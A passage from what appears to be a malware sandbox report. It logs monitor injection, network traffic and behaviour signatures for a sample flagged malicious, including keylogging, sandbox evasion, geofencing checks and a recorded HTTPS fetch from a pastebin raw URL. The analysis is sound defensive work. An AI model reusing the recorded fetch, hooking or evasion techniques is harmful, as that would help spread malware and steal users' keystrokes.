C:\\nubpj4dt\\dll\\fdhPAc.dll.\n2025-11-20 13:58:30,978 [root] DEBUG: InjectDllViaIAT: Successfully patched IAT.\n2025-11-20 13:58:30,979 [root] DEBUG: Successfully injected DLL C:\\nubpj4dt\\dll\\fdhPAc.dll.\n2025-11-20 13:58:30,982 [lib.api.process] INFO: Injected into 64-bit \n2025-11-20 13:58:30,983 [root] INFO: Announced 64-bit process name: WmiPrvSE.exe pid: 3164\n2025-11-20 13:58:30,984 [lib.api.process] INFO: Monitor config for : C:\\nubpj4dt\\dll\\3164.ini\n2025-11-20 13:58:30,985 [lib.api.process] INFO: Option 'interactive' with value '1' sent to monitor\n2025-11-20 13:58:31,549 [lib.api.process] INFO: 64-bit DLL to inject is C:\\nubpj4dt\\dll\\fdhPAc.dll, loader C:\\nubpj4dt\\bin\\KdanTrqR.exe\n2025-11-20 13:58:31,560 [root] DEBUG: Loader: Injecting process 3164 (thread 1388) with C:\\nubpj4dt\\dll\\fdhPAc.dll.\n2025-11-20 13:58:31,562 [root] DEBUG: InjectDllViaIAT: This image has already been patched.\n2025-11-20 13:58:31,562 [root] DEBUG: Successfully injected DLL C:\\nubpj4dt\\dll\\fdhPAc.dll.\n2025-11-20 13:58:31,565 [lib.api.process] INFO: Injected into 64-bit \n2025-11-20 13:58:31,578 [root] DEBUG: 3164: Python path set to 'C:\\Users\\Admin\\AppData\\Local\\Programs\\Python\\Python313-32'.\n2025-11-20 13:58:31,578 [root] DEBUG: 3164: Interactive desktop enabled.\n2025-11-20 13:58:31,579 [root] DEBUG: 3164: Dropped file limit defaulting to 100.\n2025-11-20 13:58:31,583 [root] DEBUG: 3164: Disabling sleep skipping.\n2025-11-20 13:58:31,584 [root] DEBUG: 3164: Services hook set enabled\n2025-11-20 13:58:31,589 [root] DEBUG: 3164: YaraInit: Compiled rules loaded from existing file C:\\nubpj4dt\\data\\yara\\capemon.yac\n2025-11-20 13:58:31,612 [root] DEBUG: 3164: RtlInsertInvertedFunctionTable 0x00007FFEE348090E, LdrpInvertedFunctionTableSRWLock 0x00007FFEE35DD4F0\n2025-11-20 13:58:31,613 [root] DEBUG: 3164: Monitor initialised: 64-bit capemon loaded in process 3164 at 0x00007FFEB75E0000, thread 1388, image base 0x00007FF79AAF0000, stack from 0x0000003F67AC0000-0x0000003F67AD0000\n2025-11-20 13:58:31,614 [root] DEBUG: 3164: Commandline: C:\\Windows\\system32\\wbem\\wmiprvse.exe -secured -Embedding\n2025-11-20 13:58:31,629 [root] DEBUG: 3164: Hooked 69 out of 69 functions\n2025-11-20 13:58:31,636 [root] DEBUG: 3164: RestoreHeaders: Restored original import table.\n2025-11-20 13:58:31,637 [root] INFO: Loaded monitor into process with pid 3164\n2025-11-20 13:58:31,646 [root] DEBUG: 3164: set_hooks_by_export_directory: Hooked 0 out of 69 functions\n2025-11-20 13:58:31,647 [root] DEBUG: 3164: DLL loaded at 0x00007FFEDEA70000: C:\\Windows\\SYSTEM32\\kernel.appcore (0x12000 bytes).\n2025-11-20 13:58:31,648 [root] DEBUG: 3164: DLL loaded at 0x00007FFEE1390000: C:\\Windows\\System32\\bcryptPrimitives (0x82000 bytes).\n2025-11-20 13:58:31,652 [root] DEBUG: 3164: DLL loaded at 0x00007FFEE2C20000: C:\\Windows\\System32\\clbcatq (0xa9000 bytes).\n2025-11-20 13:58:31,656 [lib.api.process] INFO: Monitor config for : C:\\nubpj4dt\\dll\\3212.ini\n2025-11-20 13:58:31,658 [lib.api.process] INFO: Option 'interactive' with value '1' sent to monitor\n2025-11-20 13:58:31,660 [lib.api.process] INFO: 64-bit DLL to inject is C:\\nubpj4dt\\dll\\fdhPAc.dll, loader C:\\nubpj4dt\\bin\\KdanTrqR.exe\n2025-11-20 13:58:31,670 [root] DEBUG: Loader: Injecting process 3212 with C:\\nubpj4dt\\dll\\fdhPAc.dll.\n2025-11-20 13:58:31,675 [root] DEBUG: 3212: Python path set to 'C:\\Users\\Admin\\AppData\\Local\\Programs\\Python\\Python313-32'.\n2025-11-20 13:58:31,675 [root] DEBUG: 3212: Disabling sleep skipping.\n2025-11-20 13:58:31,676 [root] DEBUG: 3212: Interactive desktop enabled.\n2025-11-20 13:58:31,677 [root] DEBUG: 3212: Dropped file limit defaulting to 100.\n2025-11-20 13:58:31,678 [root] DEBUG: 3212: Services hook set enabled\n2025-11-20 13:58:31,682 [root] DEBUG: 3212: YaraInit: Compiled rules loaded from existing file C:\\nubpj4dt\\data\\yara\\capemon.yac\n2025-11-20 13:58:31,705 [root] DEBUG: 3212: RtlInsertInvertedFunctionTable 0x00007FFEE348090E, LdrpInvertedFunctionTableSRWLock 0x00007FFEE35DD4F0\n2025-11-20 13:58:31,706 [root] DEBUG: 3212: Monitor initialised: 64-bit capemon loaded in process 3212 at 0x00007FFEB75E0000, thread 4136, image base 0x00007FF630560000, stack from 0x000000F58DDF5000-0x000000F58DE00000\n2025-11-20 13:58:31,707 [root] DEBUG: 3212: Commandline: C:\\Windows\\system32\\svchost.exe -k netsvcs -p\n2025-11-20 13:58:31,722 [root] DEBUG: 3212: Hooked 69 out of 69 functions\n2025-11-20 13:58:31,724 [root] INFO: Loaded monitor into process with pid 3212\n2025-11-20 13:58:31,725 [root] DEBUG: InjectDllViaThread: Successfully injected Dll into process via RtlCreateUserThread.\n2025-11-20 13:58:31,726 [root] DEBUG: Successfully injected DLL C:\\nubpj4dt\\dll\\fdhPAc.dll.\n2025-11-20 13:58:31,729 [lib.api.process] INFO: Injected into 64-bit \n2025-11-20 13:58:33,736 [root] DEBUG: 3164: DLL loaded at 0x00007FFEDC850000: C:\\Windows\\system32\\wbem\\wbemprox (0x11000 bytes).\n2025-11-20 13:58:33,755 [root] DEBUG: 3164: DLL loaded at 0x00007FFED94F0000: C:\\Windows\\system32\\wbem\\wbemsvc (0x14000 bytes).\n2025-11-20 13:58:33,774 [root] DEBUG: 3164: DLL loaded at 0x00007FFEDC210000: C:\\Windows\\system32\\wbem\\wmiutils (0x28000 bytes).\n2025-11-20 13:58:33,789 [root] DEBUG: 3164: DLL loaded at 0x00007FFEE09F0000: C:\\Windows\\SYSTEM32\\powrprof (0x4b000 bytes).\n2025-11-20 13:58:33,790 [root] DEBUG: 3164: DLL loaded at 0x00007FFECA3F0000: C:\\Windows\\SYSTEM32\\framedynos (0x52000 bytes).\n2025-11-20 13:58:33,791 [root] DEBUG: 3164: DLL loaded at 0x00007FFEC3810000: C:\\Windows\\system32\\wbem\\cimwin32 (0x20c000 bytes).\n2025-11-20 13:58:33,793 [root] DEBUG: 3164: DLL loaded at 0x00007FFEE09D0000: C:\\Windows\\SYSTEM32\\UMPDC (0x12000 bytes).\n2025-11-20 13:58:33,813 [root] DEBUG: 3164: DLL loaded at 0x00007FFECBDA0000: C:\\Windows\\SYSTEM32\\winbrand (0x35000 bytes).\n2025-11-20 13:58:33,818 [root] DEBUG: 3164: DLL loaded at 0x00007FFEE0500000: C:\\Windows\\SYSTEM32\\wldp (0x2d000 bytes).\n2025-11-20 13:58:33,823 [root] DEBUG: 3164: DLL loaded at 0x00007FFEE0500000: C:\\Windows\\SYSTEM32\\wldp (0x2d000 bytes).\n2025-11-20 13:58:33,828 [root] DEBUG: 3164: DLL loaded at 0x00007FFEE0500000: C:\\Windows\\SYSTEM32\\wldp (0x2d000 bytes).\n2025-11-20 13:58:33,832 [root] DEBUG: 3164: DLL loaded at 0x00007FFEE0500000: C:\\Windows\\SYSTEM32\\wldp (0x2d000 bytes).\n2025-11-20 13:58:33,834 [root] DEBUG: 3164: DLL loaded at 0x0000021E2C090000: C:\\Windows\\SYSTEM32\\SECURITY (0x3000 bytes).\n2025-11-20 13:58:33,836 [root] DEBUG: 3164: DLL loaded at 0x00007FFED5070000: C:\\Windows\\SYSTEM32\\SECUR32 (0xc000 bytes).\n2025-11-20 13:58:33,838 [root] DEBUG: 3164: DLL loaded at 0x00007FFEDFAA0000: C:\\Windows\\system32\\schannel (0x97000 bytes).\n2025-11-20 13:58:33,888 [root] DEBUG: 3164: DLL loaded at 0x00007FFEC3B80000: C:\\Windows\\SYSTEM32\\NETAPI32 (0x19000 bytes).\n2025-11-20 13:58:33,890 [root] DEBUG: 3164: DLL loaded at 0x00007FFED5050000: C:\\Windows\\SYSTEM32\\SAMCLI (0x19000 bytes).\n2025-11-20 13:58:33,892 [root] DEBUG: 3164: DLL loaded at 0x00007FFED6E00000: C:\\Windows\\SYSTEM32\\SRVCLI (0x28000 bytes).\n2025-11-20 13:58:33,895 [root] DEBUG: 3164: DLL loaded at 0x00007FFEE0060000: C:\\Windows\\SYSTEM32\\NETUTILS (0xc000 bytes).\n2025-11-20 13:58:33,897 [root] DEBUG: 3164: DLL loaded at 0x00007FFEE0070000: C:\\Windows\\SYSTEM32\\LOGONCLI (0x43000 bytes).\n2025-11-20 13:58:33,899 [root] DEBUG: 3164: DLL loaded at 0x00007FFED9490000: C:\\Windows\\SYSTEM32\\SCHEDCLI (0xc000 bytes).\n2025-11-20 13:58:33,901 [root] DEBUG: 3164: DLL loaded at 0x00007FFEDFCF0000: C:\\Windows\\SYSTEM32\\WKSCLI (0x19000 bytes).\n2025-11-20 13:58:33,904 [root] DEBUG: 3164: DLL loaded at 0x00007FFEDC560000: C:\\Windows\\SYSTEM32\\DSROLE (0xa000 bytes).\n2025-11-20 13:58:33,908 [root] DEBUG: 3164: DLL loaded at 0x00007FFECE280000: C:\\Windows\\SYSTEM32\\cscapi (0x12000 bytes).\n2025-11-20 13:58:33,968 [root] DEBUG: 3308: CAPEExceptionFilter: Exception 0xc0000005 accessing 0x0 caught at RVA 0xf0418 in capemon (expected in memory scans), passing to next handler.\n2025-11-20 13:58:33,984 [root] DEBUG: 3308: DLL loaded at 0x00007FFED5F30000: C:\\Windows\\system32\\winhttpcom (0x1e000 bytes).\n2025-11-20 13:58:33,993 [root] DEBUG: 3308: DLL loaded at 0x00007FFED8A20000: C:\\Windows\\system32\\WINHTTP (0x10a000 bytes).\n2025-11-20 13:58:34,002 [root] DEBUG: 3308: DLL loaded at 0x00007FFECB2E0000: C:\\Windows\\system32\\OnDemandConnRouteHelper (0x17000 bytes).\n2025-11-20 13:58:34,006 [root] DEBUG: 3308: DLL loaded at 0x00007FFEC7790000: C:\\Windows\\system32\\webio (0x98000 bytes).\n2025-11-20 13:58:34,011 [root] DEBUG: 3308: DLL loaded at 0x00007FFEE0260000: C:\\Windows\\system32\\mswsock (0x6a000 bytes).\n2025-11-20 13:58:34,015 [root] DEBUG: 3308: DLL loaded at 0x00007FFEDFF50000: C:\\Windows\\system32\\IPHLPAPI (0x3b000 bytes).\n2025-11-20 13:58:34,019 [root] DEBUG: 3308: DLL loaded at 0x00007FFEE2110000: C:\\Windows\\System32\\NSI (0x8000 bytes).\n2025-11-20 13:58:34,020 [root] DEBUG: 3308: DLL loaded at 0x00007FFEDAE00000: C:\\Windows\\SYSTEM32\\WINNSI (0xb000 bytes).\n2025-11-20 13:58:34,036 [root] DEBUG: 3308: DLL loaded at 0x00007FFEDFF90000: C:\\Windows\\SYSTEM32\\DNSAPI (0xca000 bytes).\n2025-11-20 13:58:34,042 [root] DEBUG: 3308: DLL loaded at 0x00007FFED87C0000: C:\\Windows\\System32\\rasadhlp (0xa000 bytes).\n2025-11-20 13:58:35,172 [root] DEBUG: 3308: DLL loaded at 0x00007FFED8CB0000: C:\\Windows\\System32\\fwpuclnt (0x80000 bytes).\n2025-11-20 13:58:35,227 [root] DEBUG: 3308: DLL loaded at 0x00007FFEDFAA0000: C:\\Windows\\system32\\schannel (0x97000 bytes).\n2025-11-20 13:58:35,343 [root] DEBUG: 3308: DLL loaded at 0x00007FFECB060000: C:\\Windows\\SYSTEM32\\mskeyprotect (0x15000 bytes).\n2025-11-20 13:58:35,345 [root] DEBUG: 3308: DLL loaded at 0x00007FFEE0530000: C:\\Windows\\SYSTEM32\\NTASN1 (0x3b000 bytes).\n2025-11-20 13:58:35,349 [root] DEBUG: 3308: DLL loaded at 0x00007FFEE0570000: C:\\Windows\\SYSTEM32\\ncrypt (0x27000 bytes).\n2025-11-20 13:58:35,352 [root] DEBUG: 3308: DLL loaded at 0x00007FFECB1A0000: C:\\Windows\\system32\\ncryptsslp (0x26000 bytes).\n2025-11-20 13:58:35,358 [root] DEBUG: 3308: DLL loaded at 0x00007FFEE0690000: C:\\Windows\\SYSTEM32\\MSASN1 (0x12000 bytes).\n2025-11-20 13:58:35,607 [root] DEBUG: 3308: DLL loaded at 0x00007FFEC5430000: C:\\Windows\\system32\\mlang (0x42000 bytes).\n2025-11-20 13:58:35,669 [root] DEBUG: 3308: DLL loaded at 0x00007FFEDFCB0000: C:\\Windows\\SYSTEM32\\ntmarta (0x33000 bytes).\n2025-11-20 13:58:35,670 [root] DEBUG: 3308: DLL loaded at 0x00007FFEDE0B0000: C:\\Windows\\System32\\CoreMessaging (0xf2000 bytes).\n2025-11-20 13:58:35,671 [root] DEBUG: 3308: DLL loaded at 0x00007FFEDC8A0000: C:\\Windows\\SYSTEM32\\wintypes (0x155000 bytes).\n2025-11-20 13:58:35,672 [root] DEBUG: 3308: DLL loaded at 0x00007FFEDDD50000: C:\\Windows\\System32\\CoreUIComponents (0x35b000 bytes).\n2025-11-20 13:58:35,673 [root] DEBUG: 3308: DLL loaded at 0x00007FFED8F50000: C:\\Windows\\SYSTEM32\\textinputframework (0xf9000 bytes).\n2025-11-20 13:58:37,806 [root] DEBUG: 2552: set_hooks_by_export_directory: Hooked 0 out of 69 functions\n2025-11-20 13:58:37,807 [root] DEBUG: 2552: DLL loaded at 0x00007FFECE180000: C:\\Windows\\System32\\Windows.CloudStore.Schema.Shell (0xf4000 bytes).\n2025-11-20 14:01:46,016 [root] INFO: Analysis timeout hit, terminating analysis\n2025-11-20 14:01:46,017 [lib.api.process] INFO: Terminate event set for \n2025-11-20 14:01:46,019 [root] DEBUG: 3308: Terminate Event: Attempting to dump process 3308\n2025-11-20 14:01:46,022 [root] DEBUG: 3308: DoProcessDump: Skipping process dump as code is identical on disk.\n2025-11-20 14:01:46,035 [lib.api.process] INFO: Termination confirmed for \n2025-11-20 14:01:46,035 [root] INFO: Terminate event set for process 3308\n2025-11-20 14:01:46,036 [root] DEBUG: 3308: Terminate Event: monitor shutdown complete for process 3308\n2025-11-20 14:01:46,036 [lib.api.process] INFO: Terminate event set for \n2025-11-20 14:01:46,037 [root] DEBUG: 740: Terminate Event: Attempting to dump process 740\n2025-11-20 14:01:46,038 [root] DEBUG: 740: DoProcessDump: Skipping process dump as code is identical on disk.\n2025-11-20 14:01:46,042 [lib.api.process] INFO: Termination confirmed for \n2025-11-20 14:01:46,043 [root] INFO: Terminate event set for process 740\n2025-11-20 14:01:46,043 [root] DEBUG: 740: Terminate Event: monitor shutdown complete for process 740\n2025-11-20 14:01:46,043 [lib.api.process] INFO: Terminate event set for \n2025-11-20 14:01:46,044 [root] DEBUG: 3164: Terminate Event: Attempting to dump process 3164\n2025-11-20 14:01:46,046 [root] DEBUG: 3164: DoProcessDump: Skipping process dump as code is identical on disk.\n2025-11-20 14:01:46,049 [root] DEBUG: 3164: Terminate Event: Shutdown complete for process 3164 but failed to inform analyzer.\n2025-11-20 14:01:51,043 [lib.api.process] INFO: Termination confirmed for \n2025-11-20 14:01:51,044 [root] INFO: Terminate event set for process 3164\n2025-11-20 14:01:51,044 [lib.api.process] INFO: Terminate event set for \n2025-11-20 14:01:51,045 [root] DEBUG: 3212: Terminate Event: Attempting to dump process 3212\n2025-11-20 14:01:51,046 [root] DEBUG: 3212: DoProcessDump: Skipping process dump as code is identical on disk.\n2025-11-20 14:01:51,051 [lib.api.process] INFO: Termination confirmed for \n2025-11-20 14:01:51,051 [root] DEBUG: 3212: Terminate Event: monitor shutdown complete for process 3212\n2025-11-20 14:01:51,052 [root] INFO: Terminate event set for process 3212\n2025-11-20 14:01:51,052 [root] INFO: Created shutdown mutex\n2025-11-20 14:01:52,056 [root] INFO: Shutting down package\n2025-11-20 14:01:52,057 [root] INFO: Stopping auxiliary modules\n2025-11-20 14:01:52,057 [root] INFO: Stopping auxiliary module: Browser\n2025-11-20 14:01:52,057 [root] INFO: Stopping auxiliary module: Human\n2025-11-20 14:01:52,058 [root] INFO: Stopping auxiliary module: Screenshots\n2025-11-20 14:01:52,763 [root] INFO: Finishing auxiliary modules\n2025-11-20 14:01:52,763 [root] INFO: Shutting down pipe server and dumping dropped files\n2025-11-20 14:01:52,764 [root] WARNING: Folder at path \"C:\\PJdnys\\debugger\" does not exist, skipping\n2025-11-20 14:01:52,764 [root] INFO: Uploading files at path \"C:\\PJdnys\\tlsdump\"\n2025-11-20 14:01:52,765 [lib.common.results] INFO: Uploading file C:\\PJdnys\\tlsdump\\tlsdump.log to tlsdump\\tlsdump.log; Size is 1096; Max size: 100000000\n2025-11-20 14:01:52,770 [root] INFO: Analysis completed\n", "errors": [] }, "network": { "pcap_sha256": "a064cf3df5eb9288a42993e67ec6162b743eeb05086e7d25664e60a67cd0fb50", "hosts": [ { "ip": "172.66.171.73", "country_name": "unknown", "asn": "", "asn_name": "", "hostname": "pastebin.com", "inaddrarpa": "", "ports": [] }, { "ip": "98.66.133.184", "country_name": "unknown", "asn": "", "asn_name": "", "hostname": "", "inaddrarpa": "", "ports": [] } ], "domains": [ { "domain": "mozilla.map.fastly.net", "ip": "151.101.129.91" }, { "domain": "pastebin.com", "ip": "104.20.29.150" } ], "tcp": [ { "src": "192.168.1.2", "sport": 49673, "dst": "98.66.133.184", "dport": 443, "offset": 24, "time": 0.0 }, { "src": "192.168.1.2", "sport": 49681, "dst": "40.126.53.8", "dport": 443, "offset": 8142, "time": 1.5392429828643799 }, { "src": "192.168.1.2", "sport": 49686, "dst": "40.127.240.158", "dport": 443, "offset": 49607, "time": 2.2467708587646484 }, { "src": "192.168.1.2", "sport": 49688, "dst": "35.190.72.216", "dport": 443, "offset": 63094, "time": 2.427560806274414 }, { "src": "192.168.1.2", "sport": 49690, "dst": "34.160.144.191", "dport": 443, "offset": 145420, "time": 2.7671308517456055 }, { "src": "192.168.1.2", "sport": 49692, "dst": "34.120.208.123", "dport": 443, "offset": 511282, "time": 6.634318828582764 }, { "src": "192.168.1.2", "sport": 49697, "dst": "172.66.171.73", "dport": 443, "offset": 526730, "time": 20.2219660282135 }, { "src": "192.168.1.2", "sport": 49672, "dst": "98.66.133.184", "dport": 443, "offset": 532016, "time": 61.00461483001709 } ], "udp": [ { "src": "192.168.1.2", "sport": 56138, "dst": "1.1.1.1", "dport": 53, "offset": 7443, "time": 1.4447698593139648 }, { "src": "192.168.1.2", "sport": 58070, "dst": "1.1.1.1", "dport": 53, "offset": 8777, "time": 1.5773959159851074 }, { "src": "192.168.1.2", "sport": 56079, "dst": "1.1.1.1", "dport": 53, "offset": 49342, "time": 2.2349398136138916 }, { "src": "192.168.1.2", "sport": 55833, "dst": "1.1.1.1", "dport": 53, "offset": 61716, "time": 2.4174909591674805 }, { "src": "192.168.1.2", "sport": 63927, "dst": "35.190.72.216", "dport": 443, "offset": 131676, "time": 2.659811019897461 }, { "src": "192.168.1.2", "sport": 60137, "dst": "1.1.1.1", "dport": 53, "offset": 144919, "time": 2.759732961654663 }, { "src": "192.168.1.2", "sport": 64061, "dst": "1.1.1.1", "dport": 53, "offset": 162481, "time": 3.2898948192596436 }, { "src": "192.168.1.2", "sport": 64456, "dst": "1.1.1.1", "dport": 53, "offset": 510382, "time": 6.600811958312988 }, { "src": "192.168.1.2", "sport": 50578, "dst": "1.1.1.1", "dport": 53, "offset": 511009, "time": 6.627208948135376 }, { "src": "192.168.1.2", "sport": 63841, "dst": "1.1.1.1", "dport": 53, "offset": 532494, "time": 61.11581087112427 }, { "src": "192.168.1.2", "sport": 138, "dst": "192.168.1.255", "dport": 138, "offset": 540540, "time": 137.57032680511475 } ], "icmp": [], "http": [], "dns": [ { "request": "mozilla.map.fastly.net", "type": "A", "answers": [ { "type": "A", "data": "151.101.1.91" }, { "type": "A", "data": "151.101.129.91" }, { "type": "A", "data": "151.101.193.91" }, { "type": "A", "data": "151.101.65.91" } ], "first_seen": 1763647104.742455 }, { "request": "mozilla.map.fastly.net", "type": "AAAA", "answers": [ { "type": "AAAA", "data": "2a04:4e42:200::347" }, { "type": "AAAA", "data": "2a04:4e42:600::347" }, { "type": "AAAA", "data": "2a04:4e42:400::347" }, { "type": "AAAA", "data": "2a04:4e42::347" } ], "first_seen": 1763647104.744175 }, { "request": "pastebin.com", "type": "A", "answers": [ { "type": "A", "data": "172.66.171.73" }, { "type": "A", "data": "104.20.29.150" } ], "first_seen": 1763647122.209603 } ], "smtp": [], "irc": [], "dead_hosts": [] }, "url_analysis": {}, "procmemory": [], "signatures": [ { "name": "dead_connect", "description": "Attempts to connect to a dead IP:Port (1 unique times)", "categories": [ "network" ], "severity": 1, "weight": 0, "confidence": 100, "references": [], "data": [ { "type": "call", "pid": 3308, "cid": 1424 }, { "IP": "172.66.171.73:443 (unknown)" } ], "new_data": [], "alert": false, "families": [] }, { "name": "queries_keyboard_layout", "description": "Queries the keyboard layout", "categories": [ "location_discovery" ], "severity": 1, "weight": 1, "confidence": 100, "references": [], "data": [ { "type": "call", "pid": 3308, "cid": 110 }, { "type": "call", "pid": 3308, "cid": 382 }, { "type": "call", "pid": 3308, "cid": 385 } ], "new_data": [], "alert": false, "families": [] }, { "name": "queries_locale_api", "description": "Queries the computer locale (possible geofencing)", "categories": [ "location_discovery", "geofence" ], "severity": 1, "weight": 1, "confidence": 100, "references": [], "data": [ { "type": "call", "pid": 3308, "cid": 217 }, { "type": "call", "pid": 3308, "cid": 293 }, { "type": "call", "pid": 3308, "cid": 708 }, { "type": "call", "pid": 3308, "cid": 920 }, { "type": "call", "pid": 3308, "cid": 980 }, { "type": "call", "pid": 3308, "cid": 1129 } ], "new_data": [], "alert": false, "families": [] }, { "name": "antidebug_setunhandledexceptionfilter", "description": "SetUnhandledExceptionFilter detected (possible anti-debug)", "categories": [ "anti-debug" ], "severity": 1, "weight": 1, "confidence": 40, "references": [], "data": [ { "type": "call", "pid": 3308, "cid": 31 } ], "new_data": [], "alert": false, "families": [] }, { "name": "language_check_registry", "description": "Checks system language via registry key (possible geofencing)", "categories": [ "location_discovery", "geofence" ], "severity": 1, "weight": 1, "confidence": 100, "references": [], "data": [ { "regkey": "HKEY_LOCAL_MACHINE\\SYSTEM\\ControlSet001\\Control\\Nls\\CustomLocale\\ru-RU" }, { "regkey": "HKEY_LOCAL_MACHINE\\SYSTEM\\ControlSet001\\Control\\Nls\\ExtendedLocale\\ru-RU" } ], "new_data": [], "alert": false, "families": [] }, { "name": "network_cnc_https_generic", "description": "Establishes an encrypted HTTPS connection", "categories": [ "network", "encryption" ], "severity": 2, "weight": 1, "confidence": 100, "references": [], "data": [ { "http_request": "GET /raw/04TKQkE1 HTTP/1.1\r\nConnection: Keep-Alive\r\nAccept: */*\r\nUser-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)\r\nHost: pastebin.com\r\n\r\n" }, { "type": "call", "pid": 3308, "cid": 1956 } ], "new_data": [], "alert": false, "families": [] }, { "name": "legitimate_domain_abuse", "description": "Connection to a legitimate domain from an unexpected process", "categories": [ "network", "living-off-trusted-sites" ], "severity": 2, "weight": 1, "confidence": 100, "references": [ "https://go.recordedfuture.com/hubfs/reports/cta-2023-0816.pdf", "https://lots-project.com/" ], "data": [ { "type": "call", "pid": 3308, "cid": 1160 }, { "type": "call", "pid": 3308, "cid": 1204 } ], "new_data": [], "alert": false, "families": [] }, { "name": "suspicious_communication_trusted_site", "description": "Suspicious communication with abused trusted site", "categories": [ "living-off-trusted-sites", "C&C", "network" ], "severity": 2, "weight": 1, "confidence": 50, "references": [ "https://go.recordedfuture.com/hubfs/reports/cta-2023-0816.pdf", "https://lots-project.com/" ], "data": [ { "type": "call", "pid": 3308, "cid": 1160 }, { "type": "call", "pid": 3308, "cid": 1161 }, { "type": "call", "pid": 3308, "cid": 1204 }, { "type": "call", "pid": 3308, "cid": 1962 } ], "new_data": [], "alert": false, "families": [] }, { "name": "packer_unknown_pe_section_name", "description": "The binary contains an unknown PE section name indicative of packing", "categories": [ "packer" ], "severity": 2, "weight": 1, "confidence": 100, "references": [], "data": [ { "unknown section": { "name": "text", "raw_address": "0x0011c800", "virtual_address": "0x00127000", "virtual_size": "0x0000258d", "size_of_data": "0x00002600", "characteristics": "IMAGE_SCN_CNT_INITIALIZED_DATA|IMAGE_SCN_MEM_EXECUTE", "characteristics_raw": "0x20000040", "entropy": "5.77" } }, { "unknown section": { "name": "data", "raw_address": "0x0011ee00", "virtual_address": "0x0012a000", "virtual_size": "0x00006ec0", "size_of_data": "0x00007000", "characteristics": "IMAGE_SCN_CNT_INITIALIZED_DATA|IMAGE_SCN_MEM_READ", "characteristics_raw": "0x40000040", "entropy": "6.46" } } ], "new_data": [], "alert": false, "families": [] }, { "name": "network_dns_paste_site", "description": "DNS query to a paste site or service detected", "categories": [ "network" ], "severity": 2, "weight": 1, "confidence": 100, "references": [], "data": [ { "domain": "pastebin.com" } ], "new_data": [], "alert": false, "families": [] }, { "name": "network_cnc_https_pastesite", "description": "Establishes an encrypted HTTPS connection to a paste site", "categories": [ "network", "encryption" ], "severity": 3, "weight": 1, "confidence": 100, "references": [], "data": [ { "http_request": "GET /raw/04TKQkE1 HTTP/1.1\r\nConnection: Keep-Alive\r\nAccept: */*\r\nUser-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)\r\nHost: pastebin.com\r\n\r\n" }, { "type": "call", "pid": 3308, "cid": 1956 } ], "new_data": [], "alert": false, "families": [] }, { "name": "binary_yara", "description": "Binary file triggered YARA rule", "categories": [ "static" ], "severity": 3, "weight": 1, "confidence": 80, "references": [], "data": [ { "Binary triggered YARA rule": "INDICATOR_SUSPICIOUS_AHK_Downloader" } ], "new_data": [], "alert": false, "families": [] }, { "name": "antisandbox_mouse_hook", "description": "Installs an hook procedure to monitor for mouse events", "categories": [ "anti-sandbox", "generic" ], "severity": 3, "weight": 4, "confidence": 100, "references": [], "data": [ { "type": "call", "pid": 3308, "cid": 657 } ], "new_data": [], "alert": false, "families": [] }, { "name": "infostealer_keylog", "description": "Sniffs keystrokes", "categories": [ "infostealer" ], "severity": 3, "weight": 4, "confidence": 100, "references": [], "data": [ { "SetWindowsHookExW": "Process: PoliceAssist.exe(3308)" }, { "type": "call", "pid": 3308, "cid": 655 } ], "new_data": [], "alert": false, "families": [] } ], "malscore": 9.0, "ttps": [ { "signature": "network_cnc_https_generic", "ttps": [ "T1573" ], "mbcs": [ "OC0006", "C0002" ] }, { "signature": "network_cnc_https_pastesite", "ttps": [ "T1573" ], "mbcs": [ "OC0006", "C0002" ] }, { "signature": "suspicious_communication_trusted_site", "ttps": [ "T1071" ], "mbcs": [ "OC0006", "C0002" ] }, { "signature": "packer_unknown_pe_section_name", "ttps": [ "T1027.002", "T1027" ], "mbcs": [ "OB0001", "OB0002", "OB0006", "F0001" ] }, { "signature": "network_dns_paste_site", "ttps": [ "T1071" ], "mbcs": [ "OC0006", "C0002" ] } ], "malstatus": "Malicious" }